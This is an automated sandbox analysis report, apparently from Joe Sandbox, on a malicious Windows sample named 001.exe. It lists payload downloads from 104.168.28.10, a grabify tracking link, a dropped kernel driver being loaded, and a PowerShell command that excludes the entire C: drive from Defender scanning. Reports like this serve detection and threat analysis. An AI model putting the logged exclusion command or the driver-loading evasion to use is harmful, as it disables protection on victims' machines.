Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5389312-5405695User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5405696-5438463User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5438464-5471231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5471232-5487615User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5487616-5503999User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5504000-5536767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5536768-5569535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5569536-5606383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777409325.0000000002453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d14
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1D
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1F
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1J
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1N
Source: 001.exe, 00000001.00000002.1777409325.0000000002453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1ONES-PC
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1Q
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1b
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1m
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1s
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1x
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1y
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001/01/d1~
Source: powershell.exe, 0000000B.00000002.1956010147.00000299EABA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000B.00000002.1956010147.00000299EABA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
Source: 001.exe, 00000001.00000003.1770079988.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, 1Qkj6qa_7944.sys.1.drString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
Source: 001.exe, 00000001.00000003.1770079988.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, 1Qkj6qa_7944.sys.1.drString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
Source: powershell.exe, 00000002.00000002.1365420700.000001FA925B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1935587523.00000299E253D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: 001.exe, 00000001.00000003.1770079988.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, 1Qkj6qa_7944.sys.1.drString found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000000B.00000002.1883852620.00000299D26F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1341039549.000001FA82768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1883852620.00000299D26F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1341039549.000001FA82541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1883852620.00000299D24D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1341039549.000001FA82768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1883852620.00000299D26F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.1883852620.00000299D26F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1371951384.000001FA9AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000000B.00000002.1954777646.00000299EAB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coI
Source: powershell.exe, 00000002.00000002.1341039549.000001FA82541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1883852620.00000299D24D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.1935587523.00000299E253D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.1935587523.00000299E253D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.1935587523.00000299E253D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: 001.exe, 001.exe, 00000001.00000002.1778214896.0000000140010000.00000004.00000001.01000000.00000006.sdmp, 001.exe, 00000001.00000002.1775967110.0000000000840000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: 001.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: powershell.exe, 0000000B.00000002.1883852620.00000299D26F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: 001.exe, 00000001.00000003.1772453482.000000000245E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/64F2HH
Source: 001.exe, 00000001.00000002.1777458339.000000000245E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/64F2HHMM
Source: powershell.exe, 00000002.00000002.1365420700.000001FA925B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1935587523.00000299E253D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00845D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey,1_2_00845D7C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00845D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey,1_2_00845D7C
Source: C:\Users\user\Desktop\001.exeFile created: C:\Windows\Temp\1Qkj6qa_7944.sysJump to behavior
Source: C:\Users\user\Desktop\001.exeFile deleted: C:\Windows\Temp\1Qkj6qa_7944.sysJump to behavior
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008427381_2_00842738
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00845D7C1_2_00845D7C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0098B0B11_2_0098B0B1
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009B10B21_2_009B10B2
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008420C01_2_008420C0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009410D01_2_009410D0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B00D81_2_008B00D8
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008930201_2_00893020
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009B002D1_2_009B002D
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009690201_2_00969020
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0085104C1_2_0085104C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0098D0401_2_0098D040
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0088C06C1_2_0088C06C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008870741_2_00887074
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0099919B1_2_0099919B
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009BA1961_2_009BA196
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B21981_2_008B2198
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008411CC1_2_008411CC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009AC1D41_2_009AC1D4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0085C1D01_2_0085C1D0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0097B1F21_2_0097B1F2
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008911F01_2_008911F0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009511131_2_00951113
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0097611E1_2_0097611E
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0093C1181_2_0093C118
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0099C1171_2_0099C117
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008821181_2_00882118
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0099613B1_2_0099613B
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0098C1251_2_0098C125
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0085D1481_2_0085D148
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008961701_2_00896170
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0097B2941_2_0097B294
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0088D2941_2_0088D294
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008992B81_2_008992B8
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0093C2DB1_2_0093C2DB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B42D81_2_008B42D8
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B22DC1_2_008B22DC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0093A2CC1_2_0093A2CC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0097F2F01_2_0097F2F0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0089E2241_2_0089E224
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0087923C1_2_0087923C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0099A2521_2_0099A252
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008853981_2_00885398
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0089E39C1_2_0089E39C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0093538A1_2_0093538A
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009943B51_2_009943B5
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0097E3D51_2_0097E3D5
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0091F3141_2_0091F314
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0094A32A1_2_0094A32A
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BA3581_2_008BA358
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0099F3771_2_0099F377
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008594A41_2_008594A4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B84BC1_2_008B84BC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009534AD1_2_009534AD
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009404AC1_2_009404AC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0099D4DD1_2_0099D4DD
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009214F11_2_009214F1
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0094F4FA1_2_0094F4FA
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0089E4F81_2_0089E4F8
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0086B4FC1_2_0086B4FC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008414001_2_00841400
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0088F4581_2_0088F458
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009B544E1_2_009B544E
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009B747D1_2_009B747D
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0095047E1_2_0095047E
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009555BB1_2_009555BB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009655AE1_2_009655AE
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B35B01_2_008B35B0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009665AD1_2_009665AD
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009AC5C71_2_009AC5C7
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008845E01_2_008845E0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009565FB1_2_009565FB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008635F41_2_008635F4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009B55E21_2_009B55E2
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0097752C1_2_0097752C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0091C5481_2_0091C548
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009BE5441_2_009BE544
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008885701_2_00888570
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009296B11_2_009296B1
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B26A01_2_008B26A0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BC6A01_2_008BC6A0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008A46B41_2_008A46B4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009AE6CB1_2_009AE6CB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009616FA1_2_009616FA
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009786E41_2_009786E4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0092F6ED1_2_0092F6ED
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009766061_2_00976606
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0092B6281_2_0092B628
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009BA6761_2_009BA676
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0092966A1_2_0092966A
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0089178C1_2_0089178C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008927B41_2_008927B4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0091E7131_2_0091E713
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0087876C1_2_0087876C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008668C41_2_008668C4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0093B8DE1_2_0093B8DE
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0095C8DB1_2_0095C8DB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008418EC1_2_008418EC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008AD80C1_2_008AD80C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B28201_2_008B2820
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008A78341_2_008A7834
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008A284C1_2_008A284C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B68781_2_008B6878
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0086F8701_2_0086F870
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B98701_2_008B9870
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B39841_2_008B3984
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009889CB1_2_009889CB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009219181_2_00921918
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0094D90D1_2_0094D90D
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008679181_2_00867918
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008819401_2_00881940
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00989AAB1_2_00989AAB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00855AB01_2_00855AB0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00883AB01_2_00883AB0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00876ABC1_2_00876ABC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00881AF81_2_00881AF8
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00922AEB1_2_00922AEB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B0AF41_2_008B0AF4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00931A111_2_00931A11
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B5A581_2_008B5A58
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00939A441_2_00939A44
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008A7A501_2_008A7A50
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00878A641_2_00878A64
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0084BA601_2_0084BA60
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0098BA761_2_0098BA76
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B1A741_2_008B1A74
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00932B911_2_00932B91
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0091FBB01_2_0091FBB0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00955BB71_2_00955BB7
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0097FBB31_2_0097FBB3
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00933BF11_2_00933BF1
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00849BF41_2_00849BF4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00949B2E1_2_00949B2E
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BDB301_2_008BDB30
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0094FB5C1_2_0094FB5C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008ADCAC1_2_008ADCAC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008A7CB81_2_008A7CB8
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B8CBC1_2_008B8CBC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009A5CDB1_2_009A5CDB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00892CC81_2_00892CC8
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00891CF01_2_00891CF0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0089AC081_2_0089AC08
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009A4C3C1_2_009A4C3C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00974C581_2_00974C58
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008A8C781_2_008A8C78
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00875D841_2_00875D84
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B7D801_2_008B7D80
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0084ED881_2_0084ED88
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00994D8E1_2_00994D8E
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009BDDBB1_2_009BDDBB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_009B7D0B1_2_009B7D0B
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00957D011_2_00957D01
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0095CD5D1_2_0095CD5D
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0092DD7E1_2_0092DD7E
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00844E801_2_00844E80
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00872EAC1_2_00872EAC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0094BED01_2_0094BED0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00977EC71_2_00977EC7
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00966EC41_2_00966EC4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008A2EDC1_2_008A2EDC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00971ECB1_2_00971ECB
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00848EE41_2_00848EE4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008ACEF41_2_008ACEF4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0097DE1F1_2_0097DE1F
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00940E661_2_00940E66
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BCF9C1_2_008BCF9C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00967FDD1_2_00967FDD
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B9FF41_2_008B9FF4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0085EF081_2_0085EF08
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00930F3C1_2_00930F3C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00861F501_2_00861F50
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00856F581_2_00856F58
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0094CF651_2_0094CF65
Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\1Qkj6qa_7944.sys C37BF1ABC0662B4F18607E2D7B75F5C600E45EA5604DAFFA54674E2AEBDCE9F0
Source: C:\Users\user\Desktop\001.exeProcess token adjusted: Load DriverJump to behavior
Source: C:\Users\user\Desktop\001.exeCode function: String function: 0085B600 appears 69 times
Source: 001.exe, 00000001.00000003.1770079988.0000000002E0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFlvideo.sys0 vs 001.exe
Source: 001.exe, 00000001.00000002.1779540899.000000014042F000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameFONTVIEW.EXEj% vs 001.exe
Source: 001.exeBinary or memory string: OriginalFilenameFONTVIEW.EXEj% vs 001.exe
Source: C:\Users\user\Desktop\001.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\nKxb3J_7944Jump to behavior
Source: 1Qkj6qa_7944.sys.1.drBinary string: \Device\Udp6\Device\Udp\Device\Tcp6\Device\Tcp
Source: classification engineClassification label: mal88.evad.winEXE@7/11@0/2
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00845D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey,1_2_00845D7C
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF038 AdjustTokenPrivileges,1_2_008BF038
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Users\user\Desktop\001.exeFile created: C:\Windows\Temp\qhW7w34_7944.tmpJump to behavior
Source: C:\Users\user\Desktop\001.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 001.exeVirustotal: Detection: 36%
Source: 001.exeReversingLabs: Detection: 33%
Source: unknownProcess created: C:\Users\user\Desktop\001.exe "C:\Users\user\Desktop\001.exe"
Source: C:\Users\user\Desktop\001.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\001.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
